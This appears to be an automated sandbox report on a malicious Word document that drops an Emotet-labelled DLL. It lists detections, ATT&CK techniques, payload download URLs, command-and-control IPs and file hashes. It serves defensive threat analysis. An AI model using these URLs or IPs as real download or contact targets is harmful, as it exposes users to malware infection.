Source: Yara match	File source: 7.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Path Interception	Process Injection111	Disable or Modify Tools11	OS Credential Dumping	File and Directory Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting12	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Deobfuscate/Decode Files or Information3	LSASS Memory	System Information Discovery15	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution3	Logon Script (Windows)	Logon Script (Windows)	Scripting12	Security Account Manager	Security Software Discovery11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter211	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Virtualization/Sandbox Evasion2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	PowerShell3	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Process Discovery2	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol12	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading21	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion2	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection111	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Hidden Files and Directories1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Rundll321	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ARCH_25_012021.doc	16%	Virustotal		Browse
ARCH_25_012021.doc	26%	ReversingLabs	Document-Word.Trojan.GenScript

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Kaktksw\An6othh\N49I.dll	100%	Joe Sandbox ML
C:\Users\user\Kaktksw\An6othh\N49I.dll	55%	ReversingLabs	Win32.Trojan.EmotetCrypt

Unpacked PE Files

Source	Detection	Scanner	Label	Download
12.2.rundll32.exe.2c0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
13.2.rundll32.exe.660000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.410000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
7.2.rundll32.exe.1f0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
12.2.rundll32.exe.240000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
16.2.rundll32.exe.280000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
10.2.rundll32.exe.300000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
11.2.rundll32.exe.140000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
15.2.rundll32.exe.170000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
14.2.rundll32.exe.410000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.740000.1.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
11.2.rundll32.exe.5a0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
9.2.rundll32.exe.1f0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File

Domains

Source	Detection	Scanner	Label	Link
shannared.com	5%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://3musketeersent.net/wp-includes/TUgD/	8%	Virustotal		Browse
http://3musketeersent.net/wp-includes/TUgD/	100%	Avira URL Cloud	malware
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
https://skilmu.com/wp-admin/hQVlB8b/	11%	Virustotal		Browse
https://skilmu.com/wp-admin/hQVlB8b/	0%	Avira URL Cloud	safe
http://jeevanlic.com/wp-content/r8M/	14%	Virustotal		Browse
http://jeevanlic.com/wp-content/r8M/	0%	Avira URL Cloud	safe
http://dashudance.com/thinkphp/dgs7Jm9/	14%	Virustotal		Browse
http://dashudance.com/thinkphp/dgs7Jm9/	100%	Avira URL Cloud	malware
http://shannared.com	0%	Avira URL Cloud	safe
http://shannared.com/content/lhALeS/	100%	Avira URL Cloud	malware
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/	100%	Avira URL Cloud	malware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://leopardcranes.com/zynq-linux-yaayf/w/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
shannared.com	192.169.223.13	true	true	5%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://shannared.com/content/lhALeS/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp	false		high
http://www.windows.com/pctv.	rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp	false		high
http://investor.msn.com	rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp	false		high
http://3musketeersent.net/wp-includes/TUgD/	powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	true	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.icra.org/vocabulary/.	rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	powershell.exe, 00000005.00000002.2089932064.0000000002360000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2096763886.0000000002910000.00000002.00000001.sdmp	false		high
https://skilmu.com/wp-admin/hQVlB8b/	powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://jeevanlic.com/wp-content/r8M/	powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	true	14%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://dashudance.com/thinkphp/dgs7Jm9/	powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	true	14%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://shannared.com	powershell.exe, 00000005.00000002.2095818604.0000000003CE6000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://investor.msn.com/	rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	powershell.exe, 00000005.00000002.2089932064.0000000002360000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2096763886.0000000002910000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/	powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp	false		high
http://leopardcranes.com/zynq-linux-yaayf/w/	powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
217.160.169.110	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
185.183.16.47	unknown	Spain	201453	AKIWIFIAKIWIFIES	true
51.255.203.164	unknown	France	16276	OVHFR	true
84.232.229.24	unknown	Romania	8708	RCS-RDS73-75DrStaicoviciRO	true
192.169.223.13	unknown	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	344718
Start date:	27.01.2021
Start time:	00:09:24
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ARCH_25_012021.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDOC@28/8@1/5
EGA Information:	Successful, ratio: 90.9%
HDC Information:	Successful, ratio: 8.7% (good quality ratio 6.4%) Quality average: 59.1% Quality standard deviation: 37.6%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Execution Graph export aborted for target powershell.exe, PID 2544 because it is empty Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:09:36	API Interceptor	1x Sleep call for process: msg.exe modified
00:09:37	API Interceptor	45x Sleep call for process: powershell.exe modified
00:09:43	API Interceptor	287x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
217.160.169.110	Arch_2021_717-1562532.doc	Get hash	malicious	Browse	217.160.169.110:8080/zrm2/7son14/mlqmfbi2uji6/
185.183.16.47	b6TR6I8A8W.exe	Get hash	malicious	Browse
51.255.203.164	Arch_2021_717-1562532.doc	Get hash	malicious	Browse
84.232.229.24	Notice 8283393_829.doc	Get hash	malicious	Browse	84.232.229.24/ozrf6dcy5j/7k5jvcfnl1c/ccmrg6oyv4nizx6/
	MENSAJE.doc	Get hash	malicious	Browse	84.232.229.24/v50s5eb3yu/ikc5f/tm3n1kmbtr/xhcy92qsfj3ttmk7xna/nflksuq0nonbqij/
	MENSAJE.doc	Get hash	malicious	Browse	84.232.229.24/40hbu1ld1mxg/gbxh6m/w00gy5ya8o03k/
	MES-2021_01_22-3943960.doc	Get hash	malicious	Browse	84.232.229.24/yy5pra4h/
	Documento 2201 01279.doc	Get hash	malicious	Browse	84.232.229.24/6zji6l/
	DATI 2021.doc	Get hash	malicious	Browse	84.232.229.24/hu5n7nnlfn8qzz44/4teiln75sss0k/j8fl359hk405/rlm4iik5i1da/3l3lpmieamhaykhkk/
	informazioni 536-32772764.doc	Get hash	malicious	Browse	84.232.229.24/o6p3ixr1vo/0nwr6v/oxpej1lly6ntbn4xn2/x9kd6qn1qdqyq/d0lxoj4a8vrn/
	Meddelelse-58931636.doc	Get hash	malicious	Browse	84.232.229.24/m4mfruuzgu2ajo8qu7t/bl7ktqi5zlffcg/x8ofu4so7/loe8ts1l0p5/nzne9gz6/76ki44u754xsh/
	doc_2201_3608432.doc	Get hash	malicious	Browse	84.232.229.24/jcmzbwn9r7yck/wlh8myw/
	13-2021.doc	Get hash	malicious	Browse	84.232.229.24/g4fo4/gsc17oaf9ynv0wo/670mqqf8vrds/5wmsg3x72r/mh2sm8tbg/2jp5a8m51xtysk3vljn/
	MAIL-224201 277769577.doc	Get hash	malicious	Browse	84.232.229.24/nef4co7lnfc9omq/gcs3bqsea9h/by1c/ujdlxj02m6twsi0q/5qqr6ck1fl34uz4g8l/tck4x5pqu8pykii6lbl/
192.169.223.13	Arch_2021_717-1562532.doc	Get hash	malicious	Browse	shannared.com/content/lhALeS/
	Notice 8283393_829.doc	Get hash	malicious	Browse	shannared.com/content/lhALeS/
	MPbBCArHPF.exe	Get hash	malicious	Browse	www.zante2020.com/de92/?ofutZl=LJRLKBSy6grrtpsJhG02GrYQIWz0ACN12l1WS7OpcnRH7cIC7TbO0nH4HvapdKvK3MkbU2/Law==&00GP-0=Lho4HDB0q2fdJ
	5DY3NrVgpI.exe	Get hash	malicious	Browse	www.zante2020.com/de92/?FdC4E2D=LJRLKBSy6grrtpsJhG02GrYQIWz0ACN12l1WS7OpcnRH7cIC7TbO0nH4HvapdKvK3MkbU2/Law==&AjR=9r4L1
	DEBIT NOTE_ PZU000147200.exe	Get hash	malicious	Browse	www.signpartnerpro.com/6bu2/?ElS=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAzecGlgx6T+D&Qtr=KnSlEX8p2LY
	SWIFT USD 354,883.00.exe	Get hash	malicious	Browse	www.signpartnerpro.com/6bu2/?DjU4Hl=gbG8jNk0zBv&YL0=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAze2ZVQx+R2D
	SAWR000148651.exe	Get hash	malicious	Browse	www.signpartnerpro.com/6bu2/?u6u0=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAze2ZVQx+R2D&9r4l2=xPJtQXiX
	DEBIT NOTE-1C017A.exe	Get hash	malicious	Browse	www.signpartnerpro.com/6bu2/?Cjs0=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAzecGlgx6T+D&al4=aV50jnQxv4qp0f
	Unode.exe	Get hash	malicious	Browse	www.electwatman.com/gtb/?t6A8=BSvxnM/FatY3MVaHvUsc2bSEp39whkHRVvBzdyZiJhALHrd8voDBQHL8OFVR1zdRJwYw&9r4l2=xPGHVlS8
	http://ambiancemedicalspa.com/application/orcle.php	Get hash	malicious	Browse	ambiancemedicalspa.com/application/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
shannared.com	Arch_2021_717-1562532.doc	Get hash	malicious	Browse	192.169.223.13
shannared.com	Notice 8283393_829.doc	Get hash	malicious	Browse	192.169.223.13

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	WUHU95Apq3	Get hash	malicious	Browse	46.105.5.118
	SecuriteInfo.com.ArtemisTrojan.dll	Get hash	malicious	Browse	158.69.118.130
	SecuriteInfo.com.Generic.mg.59d4c719403b7938.dll	Get hash	malicious	Browse	158.69.118.130
	SecuriteInfo.com.Generic.mg.9d9c1d19818e75cc.dll	Get hash	malicious	Browse	158.69.118.130
	SecuriteInfo.com.ArtemisTrojan.dll	Get hash	malicious	Browse	158.69.118.130
	SecuriteInfo.com.ArtemisTrojan.dll	Get hash	malicious	Browse	158.69.118.130
	roboforex4multisetup.exe	Get hash	malicious	Browse	139.99.148.202
	xDKOaCQQTQ.dll	Get hash	malicious	Browse	158.69.118.130
	4bEUfowOcg.dll	Get hash	malicious	Browse	158.69.118.130
	P_O INV 01262021.exe	Get hash	malicious	Browse	51.195.53.221
	DHL doc.exe	Get hash	malicious	Browse	51.195.53.221
	PL5CS6pwNitND2n.exe	Get hash	malicious	Browse	51.75.130.83
	Arch_2021_717-1562532.doc	Get hash	malicious	Browse	51.255.203.164
	PARTS REQUEST SO_30005141.exe	Get hash	malicious	Browse	66.70.204.222
	Document_PDF.exe	Get hash	malicious	Browse	51.195.53.221
	SecuriteInfo.com.Variant.Zusy.363976.21086.exe	Get hash	malicious	Browse	54.39.198.228
	ARCH 05 2_80074.doc	Get hash	malicious	Browse	144.217.190.240
	PO NO 214000070.doc	Get hash	malicious	Browse	94.23.169.237
	pol.doc	Get hash	malicious	Browse	94.23.169.237
	RFQ 20210125.doc	Get hash	malicious	Browse	94.23.169.237
RCS-RDS73-75DrStaicoviciRO	Arch_2021_717-1562532.doc	Get hash	malicious	Browse	84.232.229.24
	bin.sh	Get hash	malicious	Browse	5.14.105.137
	Notice 8283393_829.doc	Get hash	malicious	Browse	84.232.229.24
	MENSAJE.doc	Get hash	malicious	Browse	84.232.229.24
	MENSAJE.doc	Get hash	malicious	Browse	84.232.229.24
	MES-2021_01_22-3943960.doc	Get hash	malicious	Browse	84.232.229.24
	Documento 2201 01279.doc	Get hash	malicious	Browse	84.232.229.24
	DATI 2021.doc	Get hash	malicious	Browse	84.232.229.24
	informazioni 536-32772764.doc	Get hash	malicious	Browse	84.232.229.24
	Meddelelse-58931636.doc	Get hash	malicious	Browse	84.232.229.24
	doc_2201_3608432.doc	Get hash	malicious	Browse	84.232.229.24
	13-2021.doc	Get hash	malicious	Browse	84.232.229.24
	MAIL-224201 277769577.doc	Get hash	malicious	Browse	84.232.229.24
	Arch_05_222-3139.doc	Get hash	malicious	Browse	5.2.136.90
	MENSAJE 2021.doc	Get hash	malicious	Browse	5.2.136.90
	Documento_0501_012021.doc	Get hash	malicious	Browse	5.2.136.90
	Datos_019_9251.doc	Get hash	malicious	Browse	5.2.136.90
	document_84237-299265042.doc	Get hash	malicious	Browse	5.2.136.90
	ARCH-012021-21-1934.doc	Get hash	malicious	Browse	5.2.136.90
	Mensaje K-158701.doc	Get hash	malicious	Browse	5.2.136.90
AS-26496-GO-DADDY-COM-LLCUS	Informacion.doc	Get hash	malicious	Browse	166.62.10.32
	v07PSzmSp9.exe	Get hash	malicious	Browse	198.71.232.3
	winlog(1).exe	Get hash	malicious	Browse	184.168.131.241
	win32.exe	Get hash	malicious	Browse	184.168.131.241
	DAT.doc	Get hash	malicious	Browse	107.180.12.39
	order pdf.exe	Get hash	malicious	Browse	184.168.131.241
	Arch_2021_717-1562532.doc	Get hash	malicious	Browse	192.169.223.13
	ARCH_98_24301.doc	Get hash	malicious	Browse	198.71.233.150
	RFQ.xlsx	Get hash	malicious	Browse	198.71.232.3
	bgJPIZIYby.exe	Get hash	malicious	Browse	184.168.131.241
	E4Q30tDEB9.exe	Get hash	malicious	Browse	192.169.220.85
	RevisedPO.24488_pdf.exe	Get hash	malicious	Browse	107.180.34.198
	02131.doc	Get hash	malicious	Browse	166.62.28.133
	mensaje_012021_1-538086.doc	Get hash	malicious	Browse	198.71.233.47
	Notice 8283393_829.doc	Get hash	malicious	Browse	192.169.223.13
	message_zdm.html	Get hash	malicious	Browse	184.168.131.241
	SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exe	Get hash	malicious	Browse	107.180.25.166
	79a2gzs3gkk.doc	Get hash	malicious	Browse	166.62.10.32
	message_zdm.html	Get hash	malicious	Browse	184.168.131.241
	INFO.doc	Get hash	malicious	Browse	166.62.10.32
ONEANDONE-ASBrauerstrasse48DE	justifiI_0000445990_0009334372_1005_2555517182_30092019_E.WsF	Get hash	malicious	Browse	82.223.25.82
	JUSTF2.tar	Get hash	malicious	Browse	213.165.67.118
	NEW ORDER.xlsx	Get hash	malicious	Browse	74.208.236.196
	file.doc	Get hash	malicious	Browse	212.227.200.73
	winlog(1).exe	Get hash	malicious	Browse	74.208.236.196
	Quote Requirements.gz.exe	Get hash	malicious	Browse	70.35.203.53
	RFQ.xlsx	Get hash	malicious	Browse	70.35.203.53
	Arch_2021_717-1562532.doc	Get hash	malicious	Browse	217.160.169.110
	Bestellung.doc	Get hash	malicious	Browse	212.227.200.73
	N00048481397007.doc	Get hash	malicious	Browse	212.227.200.73
	N00048481397007.doc	Get hash	malicious	Browse	212.227.200.73
	MENSAJE.doc	Get hash	malicious	Browse	212.227.200.73
	MENSAJE.doc	Get hash	malicious	Browse	212.227.200.73
	Archivo_AB-96114571.doc	Get hash	malicious	Browse	212.227.200.73
	5390080_2021_1-259043.doc	Get hash	malicious	Browse	212.227.200.73
	5390080_2021_1-259043.doc	Get hash	malicious	Browse	212.227.200.73
	GV52H7XsQ2.exe	Get hash	malicious	Browse	217.76.142.246
	Shipping Document PL&BL Draft.exe	Get hash	malicious	Browse	74.208.236.161
	13-2021.doc	Get hash	malicious	Browse	88.208.252.128
	mallware.exe	Get hash	malicious	Browse	212.227.15.142
AKIWIFIAKIWIFIES	b6TR6I8A8W.exe	Get hash	malicious	Browse	185.183.16.47

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\Kaktksw\An6othh\N49I.dll	Arch_2021_717-1562532.doc	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D51ADA38-B04E-4308-BA86-6463BC7125FE}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3554734412254814
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbJ:IiiiiiiiiifdLloZQc8++lsJe1Mzq
MD5:	889FF7B467168A53D30DCF248A7DD694
SHA1:	03DAC36C5B9110C3EA375EF7B8E015BEB3C1DF0D
SHA-256:	4A6F10669F37499EF0C305D42D22F271DE5D958D514E2607889A474FE3D9E8AF
SHA-512:	73E90BD8869E1C1185D692AFE446ADC75B2BE75FB532CE0E555EF1ADFD2555DAA7AAD740E4DB72C0BE2C61DBD0CDB1D43120ADE8BB8BDB407B58AC6B14E3A90D
Malicious:	false
Reputation:	low
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5248432-B174-499E-B3BD-E7523F18DF93}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ARCH_25_012021.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Wed Jan 27 07:09:33 2021, length=175616, window=hide
Category:	dropped
Size (bytes):	2068
Entropy (8bit):	4.509586304702067
Encrypted:	false
SSDEEP:	48:8qqk/XT3Ik4RG3H0Qh2qqk/XT3Ik4RG3H0Q/:8qqk/XLIk4i0Qh2qqk/XLIk4i0Q/
MD5:	B51BD5888A718D41D4CD2F7F2B8103D3
SHA1:	DEEACC8F0F8827D8B6DC5005EAFFA873C909CC11
SHA-256:	4D9F202ABB4879D467C3609EBDAD6116A8FAFA230120DED70D35E1103B5C5714
SHA-512:	5E1336CE7DE5159C89C14310FA47996694F03C12770D3C1AE3DBD26BE916804C1902F29F2ABFF66C962AFE3007B64372FE2385401ACAB2403479F2B825E11BC6
Malicious:	false
